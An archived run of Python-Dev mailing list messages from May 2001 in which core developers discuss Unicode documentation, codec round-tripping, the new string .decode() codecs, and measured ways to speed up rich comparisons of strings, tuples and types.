From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:33:06 -0400
Subject: [Python-Dev] Unicode docs
In-Reply-To: <3AFFA23F.248517E3@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>

I don't know that the Unicode docs need massive work, but the docs that are
there simply don't answer the technical questions people have:  they're too
thin.

Let's keep it simple.  Contrast the Library manual's:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding. Error handling is
    done according to errors. The default behavior is to decode UTF-8
    in strict mode, meaning that encoding errors raise ValueError. See
    also the codecs module.

with Andrew's description (from http://www.amk.ca/python/2.0/):

    unicode(string [, encoding] [, errors])
    Creates a Unicode string from an 8-bit string. encoding is a
    string naming the encoding to use. The errors parameter specifies
    the treatment of characters that are invalid for the current
    encoding; passing 'strict' as the value causes an exception
    to be raised on any encoding error, while 'ignore' causes errors
    to be silently ignored and 'replace' uses U+FFFD, the official
    replacement character, in case of any problems.

The latter addresses several *fundamental* questions untouched by the former,
like whar are the datatypes of the arguments and the result, what values does
errors accept, and what do they mean?  The first blurb answers some more,
like what's the default encoding, and which exception is raised?  Neither is
complete on its own, but the reference manual should have a complete answer
to all such questions.  It doesn't have to go on at great length.

A round-trip example would be invaluable.

If Fred wanted to incorporate a brief overview too, a light rework of
Andrew/Moshe's writeup would be an excellent start.


From tim.one at home.com  Tue May 15 09:47:16 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:47:16 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>

[M.-A. Lemburg]
> The problem is: which part would raise the exception -- the
> encoder or the decoder ?

Since I don't yet use any of this stuff for real, I have no idea:  seems
mostly a question of pragmatics, and I don't have any feel for how cp875
users would view it.

> Here are some more options:
>
> * sort the items before creating the encoding table from the
>   decoding one (makes the mapping stable)

If users don't care that round-trip can fail silently, fine.

> * map keys which have multiple mappings in the encoding table
>   to None -- this causes their usage to raise an exception
>   (undefined mapping)

If users don't care that they'll get an exception when they try something
that can't be round-tripped, fine.  Or would this depend on the value of the
"errors" argument too?  Then it's easier to impose.

There's a theme here <wink>:  I have no idea how important roundtrip is in
Unicode Practice, or even that it's a constant across apps and encodings.  If
I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
wouldn't care that I can't get "love" back from u"kaka" <wink>.


From mal at lemburg.com  Tue May 15 10:19:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:19:06 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <3B00E67A.C5769082@lemburg.com>

Tim Peters wrote:
> 
> I don't know that the Unicode docs need massive work, but the docs that are
> there simply don't answer the technical questions people have:  they're too
> thin.

As much as I would like to work on this, I simply don't have the
time... if someone wants to contribute more detailed docs, though,
I'd be glad to review them and answer remaining questions.

Note that I will give a talk at the upcoming Bordeaux conference about
Python and Unicode. The slides will eventually go online after
the conference (in July). BTW, are any python-devs attending the
conference (they have some great wine in that part of France ;-) ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May 15 10:32:14 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:32:14 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>
Message-ID: <3B00E98E.1C44FF5@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > The problem is: which part would raise the exception -- the
> > encoder or the decoder ?
> 
> Since I don't yet use any of this stuff for real, I have no idea:  seems
> mostly a question of pragmatics, and I don't have any feel for how cp875
> users would view it.

If there are any... that code page dates back to 1996 and is
based in the EBCDIC world.
 
> > Here are some more options:
> >
> > * sort the items before creating the encoding table from the
> >   decoding one (makes the mapping stable)
> 
> If users don't care that round-trip can fail silently, fine.
> 
> > * map keys which have multiple mappings in the encoding table
> >   to None -- this causes their usage to raise an exception
> >   (undefined mapping)
> 
> If users don't care that they'll get an exception when they try something
> that can't be round-tripped, fine.  Or would this depend on the value of the
> "errors" argument too?  Then it's easier to impose.

The errors argument tells the codecs what to do in case a mapping
fails (from codecs.py):

        The .encode()/.decode() methods may implement different error
        handling schemes by providing the errors argument. These
        string values are defined:

         'strict' - raise a ValueError error (or a subclass)
         'ignore' - ignore the character and continue with the next
         'replace' - replace with a suitable replacement character;
                    Python will use the official U+FFFD REPLACEMENT
                    CHARACTER for the builtin Unicode codecs.

'strict' is the default for all operations that deal with auto-
conversion. 'ignore' and 'replace' allow silently ignoring the
problem.
 
> There's a theme here <wink>:  I have no idea how important roundtrip is in
> Unicode Practice, or even that it's a constant across apps and encodings.  If
> I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
> wouldn't care that I can't get "love" back from u"kaka" <wink>.

Round-tripping is obviously very important if you use Unicode
as basis for working on text. I don't know about the reasoning
behind making cp875 fail the round-trip -- Unicode certainly
provides means to make mappings round-trip safe (e.g. by reverting
to the private Unicode char. point areas).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Tue May 15 11:26:32 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 05:26:32 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>

[Martin v. Loewis]
> Is this really exactly what Python would guarantee? I'm surprised that
> x==x would always be true, but x!=x might be true also. In a type where
> x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> I had expected that you'd reduced it to
>
>   if (v == w && op == Py_EQ) /* then return Py_True */
>   if (v == w && op == Py_NE) /* then return Py_False */

I agree that would be more analogous to what PyObject_Compare() does.

I'm not sure either make sense for rich comparisons; for example, under
IEEE-754 rules, a NaN must compare not-equal to everything, including
itself(!), and richcmps are the only hope Python users have of modeling that.
Doing those pointer checks before giving richcmps a chance would kill that
hope.  Can we agree to drop this one until somebody produces stats saying
it's important?  I have no reason to suspect that it is.

> The one application where this may help is list_contains, in
> particular when searching a list of interned strings.

string_compare() could special-case pointer equality too, although I suspect
doing so would be a net loss.

> Please have a look at the patch below.

I will, but not tonight anymore -- it's been a very long day.

> ...
> I agree "in principle" :-) However, you cannot move the case "equal
> types, implementing tp_compare" before the case "one of them
> implements tp_richcompare" without changing the semantics.

Of course.  But except for instance objects, answering "does the type
implement tp_richcompare?" is one lousy pointer check, and the answer will
usually be-- provided we don't start stuffing code into *every* object's
tp_richcompare slot! --"no, so I can go to tp_compare immediately".
Coercions and richcmps are the oddball cases today.

> The change here is what you'd do when you have both richcmp and
> oldcomp; Python clearly mandates using richcmp.

Yes, except you don't usually have both today and reality is exploitable
<wink>.

> In case this is not obvious (it wasn't to me): UserList will complain
> about using the deprecated __cmp__,

Sounds like a bug to me; if cmp is deprecated, that's also news to me.

> and dictionaries will iterate over their elements differently.

dicts didn't have a tp_richcompare slot before I added it last week, and
because dicts can do a much faster and more-general job on Py_EQ and Py_NE
than dict cmp (but on nothing else).  I originally took away the tp_compare
slot for dicts and lived to regret it -- it has both now.

> Given that richcomp has to be tried first, this patch does the "common
> case" at the earliest possible time, and with no overhead, except for
> PyErr_Occurred call.

The earliest *reasonable* time would be after a short block of new pointer
checks while still inside PyObject_RichCompare():  I believe the usual case
today is that the objects are of the same type, the type doesn't have a
tp_richcompare slot, but does have a tp_compare slot.  This covers at least
ints, floats, longs and strings, where the overhead of a single function call
is most often larger than the time it actually takes to compare the darned
things.  It's not important to, e.g., get to a dict comparison quickly,
because comparing dicts is darned expensive even after we find the dict
comparison routine.  Ditto comparing instances or matrices etc.  Optimizing
for richcmps is optimizing the less important thing.

BTW, tuples have a richcompare slot today and it's unclear that's a good
idea.  They do the same kind of Py_EQ/Py_NE "length check" you like for
strings, and I'd be surprised if that didn't cost more than it saves.  Unlike
strings, whenever I compare tuples they *always* have the same size (e.g.,
think of all the decorator pattern ways tuples are used to augment sorts).

OK, across a full run of the test suite, tuplerichcompare() was called about
162000 times, all but about 50 times with Py_EQ or Py_NE.  The number of
times this code block at the start bore fruit:

	if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) {
		/* Shortcut: if the lengths differ, the tuples differ */
		PyObject *res;
		if (op == Py_EQ)
			res = Py_False;
		else
			res = Py_True;
		Py_INCREF(res);
		return res;
	}

was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code
just burned cycles.  I want to move toward optimizations that save more than
they cost <0.7 wink>.

> ...
> For strings, I would still special-case tp_richcompare: when tracing
> calls to string_richcompare, I found that most calls with Py_EQ can
> be decided by checking that the string lengths are not equal.

I expect you'd also find that the current string_compare() usually decides
they're not equal on the first character comparison (which *it*
special-cases).  So special-casing on length isn't a clear win over what's
already done.  But, if it is, bravo!  Special-case the snot out of it without
calling *any* string functions (merely calling string_richcompare likely
costs a good deal more than comparing the lengths).

more-measuring-less-guessing-ly y'rs  - tim


From thomas at xs4all.net  Tue May 15 13:51:06 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 15 May 2001 13:51:06 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local>
Message-ID: <20010515135106.A16811@xs4all.nl>

On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote:

> I thought I was th only one getting all these silly Nigerian scam spams.  I 
> figured maybe they saw my name and decided to test on me (though they might 
> more cleverly have figured that a fellow Nigerian would be wise to the game).

Actually, one of my colleagues informed me that this spam is in fact *very
old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the
Nigerian spam a mere week after getting the spam myself :) Scott (my
colleague, not Adams) remembers first getting it by fax, 15 years ago, and
again several years later. And not just one fax, but every single fax in the
company, and lots more outside of the company. Apparently the telephone
operator issued a warning to all customers not to respond to the fax.

Still-sound-advice-ly y'rs,

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May 15 14:10:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 14:10:16 +0200
Subject: [Python-Dev] Easy codec access
Message-ID: <3B011CA8.9DDB4FC7@lemburg.com>

I've just checked in a set of patches which implement the new
.decode() method along with a couple of useful codecs.

You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'

>>> "abc???".decode('latin-1')
u'abc\xe4\xf6\xfc'

>>> "abc???".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'

>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one
now.

To see just how easy it is to write codecs, please have
a look at the string codecs I added in this patch (e.g.
zlib_codec.py or hex_codec.py). I am pretty sure that there
are a lot more useful things in the standard lib which could
benefit from these easy-to-use interfaces.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Tue May 15 14:11:26 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Tue, 15 May 2001 14:11:26 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl>
Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff>

thomas wrote:

> Actually, one of my colleagues informed me that this spam is in fact
> *very old*

more info here:

http://home.rica.net/alphae/419coal/index.htm

    "A Five Billion US$ (as of 1996, much more now) worldwide
    Scam which has run since the early 1980's under Successive
    Governments of Nigeria.

    "The Nigerian Scam is, according to published reports, the
    Third to Fifth largest industry in Nigeria."

Cheers /F (highest offer this far: $155,000,000)


From guido at digicool.com  Tue May 15 17:27:31 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 10:27:31 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
             <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>

> [Martin v. Loewis]
> > Is this really exactly what Python would guarantee? I'm surprised that
> > x==x would always be true, but x!=x might be true also. In a type where
> > x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> > I had expected that you'd reduced it to
> >
> >   if (v == w && op == Py_EQ) /* then return Py_True */
> >   if (v == w && op == Py_NE) /* then return Py_False */

[Tim]
> I agree that would be more analogous to what PyObject_Compare() does.
> 
> I'm not sure either make sense for rich comparisons; for example, under
> IEEE-754 rules, a NaN must compare not-equal to everything, including
> itself(!), and richcmps are the only hope Python users have of modeling that.
> Doing those pointer checks before giving richcmps a chance would kill that
> hope.  Can we agree to drop this one until somebody produces stats saying
> it's important?  I have no reason to suspect that it is.

PEP 207 is quite explicit that == and != are not to be assumed each
other's complement.  It is silent on the x==x issue but the PEP
mentions IEEE 754 so I agree that this also shouldn't be cut short.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at acm.org  Tue May 15 17:29:10 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 15 May 2001 11:29:10 -0400 (EDT)
Subject: [Python-Dev] Unicode docs
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
References: <3AFFA23F.248517E3@lemburg.com>
	<LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > The latter addresses several *fundamental* questions untouched by
 > the former, like whar are the datatypes of the arguments and the
 > result, what values does errors accept, and what do they mean?  The
 > first blurb answers some more, like what's the default encoding,
 > and which exception is raised?  Neither is complete on its own, but
 > the reference manual should have a complete answer to all such
 > questions.  It doesn't have to go on at great length.

  I've beefed up the desciption of the unicode() function by merging
the information from AMK's document.

 > A round-trip example would be invaluable.
 > 
 > If Fred wanted to incorporate a brief overview too, a light rework of
 > Andrew/Moshe's writeup would be an excellent start.

  I'd love to have a contribution from someone with more knowledge of
what's there than me.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Tue May 15 18:35:09 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 11:35:09 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200."
             <3B011CA8.9DDB4FC7@lemburg.com> 
References: <3B011CA8.9DDB4FC7@lemburg.com> 
Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com>

> I've just checked in a set of patches which implement the new
> .decode() method along with a couple of useful codecs.

Cool!

> To see just how easy it is to write codecs, please have
> a look at the string codecs I added in this patch (e.g.
> zlib_codec.py or hex_codec.py). I am pretty sure that there
> are a lot more useful things in the standard lib which could
> benefit from these easy-to-use interfaces.

As an excercise, I added a quoted-printable codec.  It was easy
indeed!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Tue May 15 20:21:00 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Tue, 15 May 2001 20:21:00 +0200
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid>

in case anyone has two hours to spare, and the right software,
MIT's dynamic languages group has posted a quicktime video of
their recent panel on language design.

http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

(what 1/2 should result in, why it's good to have both CPython
and JPython, why whitespace is significant, why language design
is perhaps more related to architecture than math, and lots of
other goodies from Guy Steele and others)

Cheers /F


From nas at python.ca  Tue May 15 20:51:20 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 15 May 2001 11:51:20 -0700
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
Message-ID: <20010515115120.A14357@glacier.fnational.com>

Fredrik Lundh wrote:
> in case anyone has two hours to spare, and the right software,
> MIT's dynamic languages group has posted a quicktime video of
> their recent panel on language design.
> 
> http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

Does the streaming actually work for anyone?  I've given up and
started download the whole .mov files.

  Neil


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 21:45:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 21:45:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>

> more-measuring-less-guessing-ly y'rs  - tim

Producing numbers is easy :-) I've instrumented my version where
string implements richcmp, and special-cases everything I can think
of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare:   2378660
Calls with different types:      33992 (ie. one is not a string)
Calls with identical strings:   120517
Calls where lens decide !EQ:   1775716
----------------------------
Calls richcmp -> oldcomp:       448435
Total calls to oldcomp:        1225643
Calls oldcomp -> memcmp:        860174

So 5% of the calls are with identical strings, for which I can
immediately decide the outcome. 75% can be decided in terms of the
string lengths, which leaves ca. 19% for cases where lexicographical
comparison is needed.

In those cases, the first byte decides in 30%. If I remove the test
for "len decides !EQ", I get

#riches:                       2358322
#riches_ni:                      34108
#idents_decide:                 102050
#lens_decide:                        0
--------------------------------------
rest(computed):                2222164
#comps:                        2949421
#memcmps:                       917776

So still, ca. 30% can be decided by first byte. It still appears that
the total number of calls to memcmp is higher when the length is not
taken into consideration. To verify this claim, I've counted the cases
where the length decides the outcome, but looking at the first byte
also had:

lens_decide:                    1784897
lens_decide_firstbyte_wouldhave:1671148

So in 6% of the cases, checking the length alone gives a decision
which looking at the first byte doesn't; plus it saves a function
call.

To support the thesis that Py_EQ is the common case for strings, I
counted the various operations:

pyEQ:2271593
pyLE:9234
pyGE:0
pyNE:20470
pyLT:22765
pyGT:578

Now, that might be flawed since comparing strings for equal is
extremely frequent in the testsuite. To give more credibility to the
data, I also ran setup.py with my instrumented ./python:

riches:21640
riches_ni:76
riches_ni1:0
idents:2885
idents_decide:2885
lens_decide:9472
lens_decide_firstbyte_wouldhave:6223
comps:26360
memcmps:19224
pyEQ:20093
pyLE:46
pyGE:1
pyNE:548
pyLT:876
pyGT:0                                                                          
That shows that optimizing for Py_NE is not worth it. With these data,
I'll upload a patch to SF.

Regards,
Martin


From tim at digicool.com  Tue May 15 22:22:37 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 15 May 2001 16:22:37 -0400
Subject: [Python-Dev] Comparison corner case
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEINCAAA.tim@digicool.com>

Here from the tail end of a patch comment.  If you believe the illustrated
behavior is wrong, then I don't believe we gain anything from using the
tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain
for the latter is that it allows EQ/NE tuple comparison to work correctly on
tuples containing elements that support only EQ/NE comparisons):

"""
BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
because it won't believe there's any difference unless Py_EQ returns false
for some corresponding elements:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> C() < C()
1
>>> (C(),) < (C(),)
0
>>>

That doesn't make sense -- provided you believe the defn. of C makes sense.
"""


From guido at digicool.com  Tue May 15 23:36:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 16:36:57 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST."
             <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
References: <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>

Tim wrote:
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ returns false
> for some corresponding elements:
> 
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
> 
> That doesn't make sense -- provided you believe the defn. of C makes sense.

I think in this example the problem is with C, not with the tuple
algorithm.  The question is, what are you going to do otherwise?  You
could test for < first, == second -- but that means twice as many
comparisons, and for reasonably-behaved items it makes no difference
at all.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 22:59:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 22:59:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>

> Of course.  But except for instance objects, answering "does the type
> implement tp_richcompare?" is one lousy pointer check

Almost - you also have to check the type flag.

> and the answer will usually be-- provided we don't start stuffing
> code into *every* object's tp_richcompare slot! --"no, so I can go
> to tp_compare immediately".  Coercions and richcmps are the oddball
> cases today.

I'd like to add another data point, answering the question what types
are most frequently compared. The first set of data is for running the
Python testsuite.

riches      3040952  # Calls to PyType_RichCompare
eqs         2828345  # Calls where the types are equal

String      2323122
Float        141507
Int          125187
Type          99477
Tuple         84503
Long          30325
Unicode       10782
Instance       9335
List           2997
None            383
Class           318
Complex         219
Dict             57
Array            49
WeakRef          34
Function         11
File             11
SRE_Pattern      10
CFunction         9
Lock              8
Module            1

So strings cover 82% of all the compare calls of equally-typed
objects, followed by floats with 5%. Those calls together cover 93% of
the richcompare calls.

Since this might give a blurred view of what is actually used in
applications, I ran the PyXML testsuite with that python binary
also. Leaving out types that are not used, I get

riches        88465
eqs           59279

String        48097
Int            5681
Type           3170
Tuple           760
List            492
Float           332
Instance        269
Unicode         243
None            225
SRE_Pattern       4
Long              3
Complex           3

The first observation here is that "only" 67% of the calls are with
equally-typed objects. Of those, 80% are with strings, 9% with
integers.

The last example is idle, where I just did an "import httplib", for
fun.

riches        50923
eqs           49882

String        31198
Tuple          8312
Type           7978
Int            1456
None            600
SRE_Pattern     210
List            122
Instance          4
Float             1
Instance method   1

Roughly the same picture: 97% calls with equally-typed objects, of
those 62% strings, 3% integers. Notice the 15% for tuples and types,
each.

So to speed-up the common case clearly means to speed-up string
comparisons. If I'd need to optimize anything else afterwards, I'd
look into type objects - most likely, they are compared for EQ, which
can be done nicely and directly in a tp_richcompare also.

Those two optimizations together would give a richcompare to 95% of
the objects in the IDLE case.

Regards,
Martin


From guido at digicool.com  Wed May 16 00:41:12 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 17:41:12 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200."
             <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>  
            <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>

I'm curious where the frequent comparisons of types come from.

Is there lots of code that does frequent

    assert type(x) == T

typechecking?

Does isinstance(x, T) perhaps use EQ?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Tue May 15 23:51:00 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 17:51:00 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.42180.401918.223487@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> I'm curious where the frequent comparisons of types come
    GvR> from.

    GvR> Is there lots of code that does frequent

    GvR>     assert type(x) == T

    GvR> typechecking?

    GvR> Does isinstance(x, T) perhaps use EQ?

Not to mention the several hundred comparisons to None.


From jeremy at digicool.com  Tue May 15 19:26:54 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:26:54 -0400 (EDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.26334.610144.846269@slothrop.digicool.com>

I only learned recently that isinstance() can be called with types
instead of classes.  I suppose the name lead me in the wrong
direction.  I had the silly idea that it only applied to instances
<0.1 wink>.

So it comes as little surprise to me that there is a lot of code
executed in, e.g., the test suite that does comparisons on types.

In the Lib directory, there are 63 files that use == and the builtin
type function.  (Simple grep.)  A total of 139 instances of this
idiom.  A cursory scan suggests that most of the call are things like
type(obj) == type('').

In the Zope source tree, there are 58 files and 98 individual
occurrences.  It again looks like comparisons against string type is
the most common.

I can think of two common cases where an object is checked against the
string type.  One is an interface that takes a file-like object or its
path.  The other is an interface that takes a sequence, but doesn't
want to try a string as a sequence.

Sounds like we ought to do a search-and-destroy on type comparisons,
replacing with isinstance() where possible.

Jeremy


From jeremy at digicool.com  Tue May 15 19:41:58 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:41:58 -0400 (EDT)
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <20010515115120.A14357@glacier.fnational.com>
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
	<20010515115120.A14357@glacier.fnational.com>
Message-ID: <15105.27238.582785.851371@slothrop.digicool.com>

I download one of the files, but the quicktime player I have on my
Windows box said it didn't understand the file format.  I eventually
got the streaming version at the 100kbps to "work" where work meant
mostly an audio feed and occasional stills that were recognizable.

Jeremy

PS It was cool to watch the one on compilation.  Mat Hostetter, one of
the panelists, is my old roommate!


From barry at digicool.com  Wed May 16 00:56:10 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 18:56:10 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
	<15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <15105.46090.203278.397835@anthem.wooz.org>

>>>>> "JH" == Jeremy Hylton <jeremy at digicool.com> writes:

    JH> I only learned recently that isinstance() can be called with
    JH> types instead of classes.  I suppose the name lead me in the
    JH> wrong direction.  I had the silly idea that it only applied to
    JH> instances <0.1 wink>.

    JH> So it comes as little surprise to me that there is a lot of
    JH> code executed in, e.g., the test suite that does comparisons
    JH> on types.

    JH> In the Lib directory, there are 63 files that use == and the
    JH> builtin type function.  (Simple grep.)  A total of 139
    JH> instances of this idiom.  A cursory scan suggests that most of
    JH> the call are things like type(obj) == type('').

Even without the forward-looking insight that types are classes
<wink>, I think type comparisions should have been done with `is' and
not ==.  So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1 == is naturally, slower than `is', but isinstance()
comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time
r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'


one()
two()
three()
										    

From tim.one at home.com  Wed May 16 01:49:03 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 19:49:03 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGKKCAA.tim.one@home.com>

Making the 5am email concrete, this is what I meant:

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
